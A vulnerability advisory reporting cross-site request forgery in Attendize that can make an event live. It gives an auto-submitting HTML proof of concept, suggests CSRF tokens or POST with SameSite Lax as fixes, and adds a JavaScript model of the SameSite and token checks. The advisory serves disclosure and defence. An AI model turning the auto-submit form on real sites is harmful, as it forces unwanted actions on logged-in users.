Cross-Site Request Forgery (CSRF) in attendize/attendize
Sep 25th 2021
An attacker is able to make an event live.
Proof of Concept
While logged in, open this POC.html in a browser.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="Demo URL">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
This vulnerability can force a user to unintentionally mark an event live.
Tested on Safari.
You should set a CSRF token on such GET requests, or use POST instead of GET: because the cookie's SameSite attribute is Lax, a POST request from another origin would not carry the cookie.
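The two remediations above can be checked against a small model of the browser's SameSite decision and the server's token check. This is an added example, not code from Attendize or from the original report; the route names, route shapes and token value are constructed for illustration.

```javascript
// Added example: a model of cookie attachment under SameSite and of a
// server-side CSRF token check. All route data below is constructed.
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS', 'TRACE']);

// Would the browser attach the session cookie to this request?
function cookieAttached(sameSite, req) {
  if (!req.crossSite) return true;            // same-site requests always carry it
  switch (sameSite) {
    case 'None':   return true;
    case 'Strict': return false;
    case 'Lax':    // cross-site: only top-level navigations with a safe method
      return req.topLevelNavigation && SAFE_METHODS.has(req.method);
    default: throw new Error(`unknown SameSite value: ${sameSite}`);
  }
}

// Would a state-changing route act on this request?
function requestAccepted(route, sameSite, req) {
  if (req.method !== route.method) return false;        // method not allowed
  if (!cookieAttached(sameSite, req)) return false;     // no session, not authenticated
  if (route.requiresCsrfToken && req.csrfToken !== route.expectedToken) {
    return false;                                       // token missing or wrong
  }
  return true;
}

// A cross-site, auto-submitted form: a top-level navigation with no token,
// because the other origin cannot read the victim's token.
function forgedFormRequest(method) {
  return { method, crossSite: true, topLevelNavigation: true, csrfToken: undefined };
}

// Hypothetical route definitions for the "make event live" action.
const routes = {
  reported:     { method: 'GET',  requiresCsrfToken: false },
  getWithToken: { method: 'GET',  requiresCsrfToken: true, expectedToken: 'constructed-token' },
  postOnly:     { method: 'POST', requiresCsrfToken: false },
};

// For each route, does the forged request succeed under the given SameSite mode?
function evaluate(sameSite = 'Lax') {
  return Object.fromEntries(Object.entries(routes).map(([name, route]) =>
    [name, requestAccepted(route, sameSite, forgedFormRequest(route.method))]));
}
```

Under `Lax` only the reported GET route accepts the forged request. Calling `evaluate('None')` shows that the POST-only fix depends entirely on the cookie's SameSite setting, while the token check holds in either mode.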